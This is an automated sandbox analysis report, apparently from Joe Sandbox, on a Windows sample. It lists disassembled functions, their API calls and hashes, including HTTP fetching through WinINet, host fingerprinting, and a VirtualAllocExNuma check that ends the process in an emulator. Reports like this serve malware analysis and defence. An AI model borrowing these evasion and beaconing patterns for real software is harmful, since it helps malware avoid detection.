                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat
                          • String ID: fplugins
                          • API String ID: 2500673778-38756186
                          • Opcode ID: a2475b3ce4742d7c3c797e3280b5825e2564041eed3cb4aeadb01c54a4e63ef3
                          • Instruction ID: 9fbaba91226f05670f1fcebdc6f6f00d31d9aa446b4e56865b214deb97c44cb7
                          • Opcode Fuzzy Hash: a2475b3ce4742d7c3c797e3280b5825e2564041eed3cb4aeadb01c54a4e63ef3
                          • Instruction Fuzzy Hash: 99E25971A05351CFC734DF29D488B5ABBE1BF88304F58856DE48D8B292DB399846CF92
                          Function 00706C40 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 229networkstringfileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2234 706c40-706c64 call 702930 2237 706c75-706c97 call 704bc0 2234->2237 2238 706c66-706c6b 2234->2238 2242 706c99 2237->2242 2243 706caa-706cba call 702930 2237->2243 2238->2237 2239 706c6d-706c6f lstrcpy 2238->2239 2239->2237 2245 706ca0-706ca8 2242->2245 2247 706cc8-706cf5 InternetOpenA StrCmpCA 2243->2247 2248 706cbc-706cc2 lstrcpy 2243->2248 2245->2243 2245->2245 2249 706cf7 2247->2249 2250 706cfa-706cfc 2247->2250 2248->2247 2249->2250 2251 706d02-706d22 InternetConnectA 2250->2251 2252 706ea8-706ebb call 702930 2250->2252 2253 706ea1-706ea2 InternetCloseHandle 2251->2253 2254 706d28-706d5d HttpOpenRequestA 2251->2254 2261 706ec9-706ee0 call 702a20 * 2 2252->2261 2262 706ebd-706ebf 2252->2262 2253->2252 2256 706d63-706d65 2254->2256 2257 706e94-706e9e InternetCloseHandle 2254->2257 2259 706d67-706d77 InternetSetOptionA 2256->2259 2260 706d7d-706dad HttpSendRequestA HttpQueryInfoA 2256->2260 2257->2253 2259->2260 2263 706dd4-706de4 call 723d90 2260->2263 2264 706daf-706dd3 call 7271e0 call 702a20 * 2 2260->2264 2262->2261 2265 706ec1-706ec3 lstrcpy 2262->2265 2263->2264 2274 706de6-706de8 2263->2274 2265->2261 2276 706e8d-706e8e InternetCloseHandle 2274->2276 2277 706dee-706e07 InternetReadFile 2274->2277 2276->2257 2277->2276 2280 706e0d 2277->2280 2282 706e10-706e15 2280->2282 2282->2276 2283 706e17-706e3d call 727310 2282->2283 2286 706e44-706e51 call 702930 2283->2286 2287 706e3f call 702a20 2283->2287 2291 706e61-706e8b call 702a20 InternetReadFile 2286->2291 2292 706e53-706e57 2286->2292 2287->2286 2291->2276 2291->2282 2292->2291 2293 706e59-706e5b lstrcpy 2292->2293 2293->2291
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 00706C6F
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00706CC2
                          • InternetOpenA.WININET(0072CFEC,00000001,00000000,00000000,00000000), ref: 00706CD5
                          • StrCmpCA.SHLWAPI(?,010DE538), ref: 00706CED
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00706D15
                          • HttpOpenRequestA.WININET(00000000,GET,?,010DDEB8,00000000,00000000,-00400100,00000000), ref: 00706D50
                          • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00706D77
                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00706D86
                          • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00706DA5
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00706DFF
                          • lstrcpy.KERNEL32(00000000,?), ref: 00706E5B
                          • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00706E7D
                          • InternetCloseHandle.WININET(00000000), ref: 00706E8E
                          • InternetCloseHandle.WININET(?), ref: 00706E98
                          • InternetCloseHandle.WININET(00000000), ref: 00706EA2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00706EC3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                          • String ID: ERROR$GET
                          • API String ID: 3687753495-3591763792
                          • Opcode ID: b089a8f63b945662055bca0e6924ba99f9c80be778d041cc169ab1f1dfb583ea
                          • Instruction ID: 4488fbf9b532f3832c05124406af7b9678b01100bbf37552ed57a723d4257b06
                          • Opcode Fuzzy Hash: b089a8f63b945662055bca0e6924ba99f9c80be778d041cc169ab1f1dfb583ea
                          • Instruction Fuzzy Hash: 90816F76A54315EBEB20DFA4DC49BAE77F8AF44700F144268F905E7281DB78AD058B90
                          Function 0071F2F8 Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 391stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(010C6420), ref: 0071F315
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071F3A3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071F3C7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071F47B
                          • lstrcpy.KERNEL32(00000000,010C6420), ref: 0071F4BB
                          • lstrcpy.KERNEL32(00000000,010D8B60), ref: 0071F4EA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071F59E
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0071F61C
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071F64C
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071F69A
                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 0071F718
                          • lstrlen.KERNEL32(010D8AE0), ref: 0071F746
                          • lstrcpy.KERNEL32(00000000,010D8AE0), ref: 0071F771
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071F793
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071F7E4
                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 0071FA32
                          • lstrlen.KERNEL32(010D8AC0), ref: 0071FA60
                          • lstrcpy.KERNEL32(00000000,010D8AC0), ref: 0071FA8B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071FAAD
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071FAFE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID: ERROR
                          • API String ID: 367037083-2861137601
                          • Opcode ID: ee3f70142b42a16836294ee59987d185dcb50fbde09a1c1f8c03baea8a29756b
                          • Instruction ID: bce78b76629e2171cb644fbe9198f5742710de21f0328995154c2069164a7c34
                          • Opcode Fuzzy Hash: ee3f70142b42a16836294ee59987d185dcb50fbde09a1c1f8c03baea8a29756b
                          • Instruction Fuzzy Hash: 34F13D74A15202CFDB24DF69D898AA5B7F5BF44314B18C1B9D809AB2E1D739DC82DF40
                          Function 00718CA0 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 176COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2721 718ca0-718cc4 StrCmpCA 2722 718cc6-718cc7 ExitProcess 2721->2722 2723 718ccd-718ce6 2721->2723 2725 718ee2-718eef call 702a20 2723->2725 2726 718cec-718cf1 2723->2726 2727 718cf6-718cf9 2726->2727 2729 718ec3-718edc 2727->2729 2730 718cff 2727->2730 2729->2725 2770 718cf3 2729->2770 2732 718d30-718d3f lstrlen 2730->2732 2733 718e56-718e64 StrCmpCA 2730->2733 2734 718d5a-718d69 lstrlen 2730->2734 2735 718dbd-718dcb StrCmpCA 2730->2735 2736 718ddd-718deb StrCmpCA 2730->2736 2737 718dfd-718e0b StrCmpCA 2730->2737 2738 718e1d-718e2b StrCmpCA 2730->2738 2739 718e3d-718e4b StrCmpCA 2730->2739 2740 718d84-718d92 StrCmpCA 2730->2740 2741 718da4-718db8 StrCmpCA 2730->2741 2742 718d06-718d15 lstrlen 2730->2742 2743 718e88-718e9a lstrlen 2730->2743 2744 718e6f-718e7d StrCmpCA 2730->2744 2757 718d41-718d46 call 702a20 2732->2757 2758 718d49-718d55 call 702930 2732->2758 2733->2729 2753 718e66-718e6d 2733->2753 2759 718d73-718d7f call 702930 2734->2759 2760 718d6b-718d70 call 702a20 2734->2760 2735->2729 2746 718dd1-718dd8 2735->2746 2736->2729 2747 718df1-718df8 2736->2747 2737->2729 2748 718e11-718e18 2737->2748 2738->2729 2749 718e31-718e38 2738->2749 2739->2729 2750 718e4d-718e54 2739->2750 2740->2729 2745 718d98-718d9f 2740->2745 2741->2729 2751 718d17-718d1c call 702a20 2742->2751 2752 718d1f-718d2b call 702930 2742->2752 2755 718ea4-718eb0 call 702930 2743->2755 2756 718e9c-718ea1 call 702a20 2743->2756 2744->2729 2754 718e7f-718e86 2744->2754 2745->2729 2746->2729 2747->2729 2748->2729 2749->2729 2750->2729 2751->2752 2779 718eb3-718eb5 2752->2779 2753->2729 2754->2729 2755->2779 2756->2755 2757->2758 2758->2779 2759->2779 2760->2759 2770->2727 2779->2729 2780 718eb7-718eb9 2779->2780 2780->2729 2781 718ebb-718ebd lstrcpy 2780->2781 2781->2729
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: block
                          • API String ID: 621844428-2199623458
                          • Opcode ID: 97975a0cb0b32992b57924c69f498dceed1301d8ac470fc161d366671be41c8d
                          • Instruction ID: 2026dc7067d14159d7b9c856b4b022548a74cd78f7fb90818d9da2281d8293c3
                          • Opcode Fuzzy Hash: 97975a0cb0b32992b57924c69f498dceed1301d8ac470fc161d366671be41c8d
                          • Instruction Fuzzy Hash: 38519371A28701DFD7609F79DC88AAB77F4BB04700B10481DF442D6691DBBCE9859F62
                          Function 00722740 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 93memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2782 722740-722783 GetWindowsDirectoryA 2783 722785 2782->2783 2784 72278c-7227ea GetVolumeInformationA 2782->2784 2783->2784 2785 7227ec-7227f2 2784->2785 2786 7227f4-722807 2785->2786 2787 722809-722820 GetProcessHeap RtlAllocateHeap 2785->2787 2786->2785 2788 722822-722824 2787->2788 2789 722826-722844 wsprintfA 2787->2789 2790 72285b-722872 call 7271e0 2788->2790 2789->2790
                          APIs
                          • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 0072277B
                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,007193B6,00000000,00000000,00000000,00000000), ref: 007227AC
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0072280F
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00722816
                          • wsprintfA.USER32 ref: 0072283B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                          • String ID: :\$C
                          • API String ID: 2572753744-3309953409
                          • Opcode ID: a9a37976e7106338b731ed07bd5e9656786cc20a2b500028726260ce8cba52fa
                          • Instruction ID: 1332054a9ea2f954027291a8a96504921de127e67fcb6e97fd2bf3fdc86333f0
                          • Opcode Fuzzy Hash: a9a37976e7106338b731ed07bd5e9656786cc20a2b500028726260ce8cba52fa
                          • Instruction Fuzzy Hash: BF319EB1D08259ABCB14CFB89985AEFFFBCEF58700F10016AE505F7250E2348B418BA1
                          Function 00704BC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50stringnetworkCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2793 704bc0-704bce 2794 704bd0-704bd5 2793->2794 2794->2794 2795 704bd7-704c48 ??2@YAPAXI@Z * 3 lstrlen InternetCrackUrlA call 702a20 2794->2795
                          APIs
                          • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 00704BF7
                          • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00704C01
                          • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00704C0B
                          • lstrlen.KERNEL32(?,00000000,?), ref: 00704C1F
                          • InternetCrackUrlA.WININET(?,00000000), ref: 00704C27
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ??2@$CrackInternetlstrlen
                          • String ID: <
                          • API String ID: 1683549937-4251816714
                          • Opcode ID: 6edd1c90a8b0f40ff17839642fe9944dcc6b725c5604629b64e4e6c88ee2cace
                          • Instruction ID: 4accf11453684745f720c91f5942fd9ff4b05eba2229eea8ad8ac59ad02e6f4d
                          • Opcode Fuzzy Hash: 6edd1c90a8b0f40ff17839642fe9944dcc6b725c5604629b64e4e6c88ee2cace
                          • Instruction Fuzzy Hash: BA012D71D00218ABDB10DFA8EC49B9EBBF8EB08320F008126F914E7390EB7459058FD4
                          Function 00701030 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2798 701030-701055 GetCurrentProcess VirtualAllocExNuma 2799 701057-701058 ExitProcess 2798->2799 2800 70105e-70107b VirtualAlloc 2798->2800 2801 701082-701088 2800->2801 2802 70107d-701080 2800->2802 2803 7010b1-7010b6 2801->2803 2804 70108a-7010ab VirtualFree 2801->2804 2802->2801 2804->2803
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00701046
                          • VirtualAllocExNuma.KERNEL32(00000000), ref: 0070104D
                          • ExitProcess.KERNEL32 ref: 00701058
                          • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 0070106C
                          • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 007010AB
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                          • String ID:
                          • API String ID: 3477276466-0
                          • Opcode ID: 9f3ca192f493381c58a290f8f7e2790b06b41c58c7bbc4afca76b97ad346bc31
                          • Instruction ID: ecf129e08f5cf03aff4ec7ea0a6179ae0e642d427d5fc998df312bc90ee2b659
                          • Opcode Fuzzy Hash: 9f3ca192f493381c58a290f8f7e2790b06b41c58c7bbc4afca76b97ad346bc31
                          • Instruction Fuzzy Hash: 0501F471748304BBE7244B656C5AF6B77EDE785B05F208414F744E72C0D9B5EA009A64
                          Function 0071EE90 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2805 71ee90-71eeb5 call 702930 2808 71eeb7-71eebf 2805->2808 2809 71eec9-71eecd call 706c40 2805->2809 2808->2809 2810 71eec1-71eec3 lstrcpy 2808->2810 2812 71eed2-71eee8 StrCmpCA 2809->2812 2810->2809 2813 71ef11-71ef18 call 702a20 2812->2813 2814 71eeea-71ef02 call 702a20 call 702930 2812->2814 2819 71ef20-71ef28 2813->2819 2824 71ef45-71efa0 call 702a20 * 10 2814->2824 2825 71ef04-71ef0c 2814->2825 2819->2819 2821 71ef2a-71ef37 call 702930 2819->2821 2821->2824 2830 71ef39 2821->2830 2825->2824 2826 71ef0e-71ef0f 2825->2826 2829 71ef3e-71ef3f lstrcpy 2826->2829 2829->2824 2830->2829
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071EEC3
                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 0071EEDE
                          • lstrcpy.KERNEL32(00000000,ERROR), ref: 0071EF3F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
